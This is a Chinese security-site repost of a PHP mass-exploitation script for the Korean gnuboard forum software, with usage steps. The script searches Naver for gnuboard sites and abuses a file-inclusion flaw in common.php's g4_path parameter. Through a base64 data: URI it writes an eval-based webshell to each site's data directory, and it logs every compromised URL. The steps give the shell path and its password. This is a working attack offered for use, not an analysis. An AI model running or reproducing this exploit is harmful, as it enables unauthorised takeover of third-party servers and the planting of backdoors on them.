首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
韩国gnuboard论坛漏洞EXP及使用方法
来源:http://bbs.honkwin.com 作者:honkwin 发布时间:2010-01-14  

摘自:红科网安
http://bbs.honkwin.com

1.本机搭建PHP环境
2.将EXP程序保存为akt.php
3.CMD下执行php akt.php
4.产生的akt.txt中记录成功URL
5.http://目标URL/data/hardison.php   密码:akteam   用PHP连接

EXP:

复制代码
  1. <?php
  2. echo"   +----------------------------------------------------------------+\r\n";
  3. echo"                   http://bbs.honkwin.com\r\n";
  4. echo"   +----------------------------------------------------------------+\r\n";
  5. for ($ii=1;$ii<=99;$ii++)
  6. {
  7. $c=(int)$ii*10+1;
  8. $a="web.search.naver.com";
  9. $b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10
  10.  
  11. &&qvt=0&sm=tab_pge";
  12. get($a,$b);
  13.  
  14. }
  15. function get($host,$file)
  16. {
  17.           
  18.              $fp = fsockopen($host, 80, $errno, $errstr, 10);
  19.              if (!$fp) {
  20.                  echo "SocketError: $errstr ($errno)\n";
  21.                  return false;
  22.              }
  23.              $get = "GET $file HTTP/1.1\r\n";
  24.              $get .= "Host: $host\r\n";
  25.              $get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
  26.              $get .= "Referer: http://$host\r\n";
  27.              $get .= "Connection: Close\r\n";
  28.                          $get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
  29.              fwrite($fp, $get);
  30.              $response=stream_get_contents($fp);
  31.              preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
  32.              for ($i=0;$i<count($put[0]);$i++)
  33.                          {
  34.                          $a=(int)$i*3;
  35.                       
  36.                       
  37.                          fuck($put[0][$a]);
  38.                          //echo count($put[0]);
  39.                          //print_r($put[0]);
  40.                          //fuck($put[0][$i]);
  41.                       
  42.                          break;
  43.                       
  44.                          }
  45.                       
  46.           
  47.              fclose($fp);
  48.                                               
  49. }
  50. function fuck($ok)
  51. {
  52. $a=preg_replace('(bbs\/board.php)','',$ok);
  53. $file=$a."common.php?g4_path=/tmp2345";
  54. $xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL2hhcmRpc29uLnBocCcsJ3crJyksJzw/
  55.  
  56. cGhwIEBldmFsKCRfUE9TVFtob29lZHVdKTtlY2hvICJoYXJkaXNvbiBiaWcgYmlnICI7Pz4nKTs/Pg==";
  57. $shell=$a."data/akteam.php";
  58. $target=parse_url($ok);
  59. $sitepath=$target['host'];
  60. $xx=@file_get_contents($file);
  61. if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx))
  62. {
  63. print $sitepath."     Vulnerability yes"."\r\n";
  64. @file_get_contents($xxx);
  65. $oksehll=@file_get_contents($shell);
  66. if(!eregi("(\\02345)",$xx))
  67. {
  68. print $sitepath."     ok"."\r\n";
  69. }
  70. if (eregi("(akteam)",$oksehll))
  71. {
  72. print $shell." pass:akteam"."\r\n";
  73. $axx="\r\n".$shell;
  74. $sh=fopen('akt.txt',"a+");
  75. fwrite($sh,$axx);
  76. fclose($sh);
  77. }
  78.  
  79. }
  80. else
  81. {
  82. print $sitepath."     Vulnerability no"."\r\n";
  83. }
  84. }
  85.  
  86. ?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·PHPWind7.5 远程包含0DAY
·MyBB 1.4 admin remote code exe
·phpwind 7.5 Multiple Include V
·JBOSS远程代码执行漏洞
·OK3W v4.7文章管理系统漏洞
·睛天电影系统注入漏洞
·Shopxp v8.0 SQL Injection 0day
·Discuz插件《虚拟股市》blind In
·Discuz!7.0-7.2后台settings.inc
·Phpwind7.5 后台本地包含漏洞利
·MASA2EL Music City v1.0远程注
·Sablog-X v2.x 任意变量覆盖漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved